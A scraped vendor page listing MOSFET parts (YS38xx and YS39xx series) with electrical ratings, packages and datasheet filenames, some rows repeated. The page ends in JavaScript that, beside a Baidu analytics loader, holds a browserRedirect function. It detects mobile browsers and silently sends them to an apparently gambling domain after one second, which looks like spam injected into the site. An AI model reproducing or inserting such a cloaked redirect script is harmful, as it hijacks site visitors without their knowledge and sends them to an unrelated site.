5197注册

  • EN

MOSFET

Part Number Configuration Type ESD Drain-Source Voltage(V) Gate-Source Voltage(V) Gate-Threshold Voltage, VGS(th)(V) Continuous Drain Current, ID(A) Static Drain-Source On-Resistance RDS(ON) (mΩ) Max. at VGS= Power Dissipation Package download
VDS VGS Min. Max. TA=25℃ TA=70℃ Tc=25℃ Tc=100℃ 10V 4.5V 2.5V 1.8V 1.5V PD(W)
YS3808VBB Dual N+N No 30 ±20 1.2 2.5 - - 42 27 10.5 16 - - - 35 PPAK3X3 YS3808VBB_REV.02_20200522.pdf
YS3810HBB Asym. Dual N+N No 30 ±20 1.2 2.5 10.8 6.8 19.5 12.3 10.5 14 - - - 27 PPAK3X3 YS3810HBB_REV.02_20200522.pdf
YS3810HBB Asym. Dual N+N No 30 ±20 1.2 2.5 10.8 6.8 19.5 12.3 10.5 14 - - - 27 PPAK3X3 YS3810HBB_REV.02_20200522.pdf
YS3810HCB Asym. Dual N+N No 30 ±20 1.2 2.5 10.8 6.8 19.5 12.3 10.5 14 - - - 27 DFN3X3 YS3810HCB_REV.02_20200522.pdf
YS3810HCB Asym. Dual N+N No 30 ±20 1.2 2.5 10.8 6.8 19.5 12.3 10.5 14 - - - 27 DFN3X3 YS3810HCB_REV.02_20200522.pdf
YS3810VBB Dual N+N No 30 ±20 1.2 2.5 - - 35 22 13 18 - - - 27 PPAK3X3 YS3810VBB_REV.02_20200522.pdf
YS3812VBB Dual N+N No 30 ±20 1.2 2.5 - - 20 13 20 30 - - - 20 PPAK3X3 YS3812VBB_REV.02_20200522.pdf
YS3903ZBB Single P No -30 ±20 -1.2 -2.5 - - -50 -32 8.5 14 - - - 59 PPAK3X3 YS3903ZBB_REV.02_20200522.pdf
YS3904ZBB Single N No 30 ±20 1.2 2.5 - - 80 51 3.8 5.5 - - - 66 PPAK3X3 YS3904ZBB_REV.02_20200522.pdf
YS3905ZBB Single P No -30 ±20 -1.2 -2.5 - - -30 -19 15 25 - - - 23 PPAK3X3 YS3905ZBB_REV.02_20200522.pdf
YS3906ZBB Single N No 30 ±20 1.2 2.5 - - 60 38 6 9 - - - 45 PPAK3X3 YS3906ZBB_REV.02_20200522.pdf
YS3907ZBB Single P No -30 ±20 -1.2 -2.5 - - -30 -19 20 35 - - - 27 PPAK3X3 YS3907ZBB_REV.02_20200522.pdf
YS3908ZBB Single N No 30 ±20 1.2 2.5 - - 48 30 8.5 13 - - - 35 PPAK3X3 YS3908ZBB_REV.02_20200522.pdf
YS3909S Single P No -30 ±20 -1.2 -2.2 - - -5.1 -3.2 32 46 - - - 1.56 SOT-23 YS3909S_REV.02_20200522.pdf
YS3910ZBB Single N No 30 ±20 1.2 2.5 - - 35 22 12 18 - - - 27 PPAK3X3 YS3910ZBB_REV.02_20200522.pdf
YS3911L Single P No -30 ±20 -1.2 -2.2 - - -4.5 -2.85 55 85 - - - 1.78 SOT-223 YS3911L_REV.02_20200522.pdf
YS3911S Single P No -30 ±20 -1.2 -2.2 -4.1 -3.3 - - 55 85 - - - 1.56 SOT-23 YS3911S_REV.02_20200522.pdf
YS3912K Single N No 30 ±20 1.2 2.2 - - 7.5 4.74 24 34 - - - 4.1 SOT-89 YS3912K_REV.02_20200522.pdf
YS3912Q Single N No 30 ±20 1.2 2.5 - - 6.5 4.1 24 34 - - - 1.56 SOT-26 YS3912Q_REV.02_20200522.pdf
YS3912S Single N No 30 ±20 1.2 2.5 - - 6.5 4.1 24 34 - - - 1.56 SOT-23 YS3912S_REV.02_20200522.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();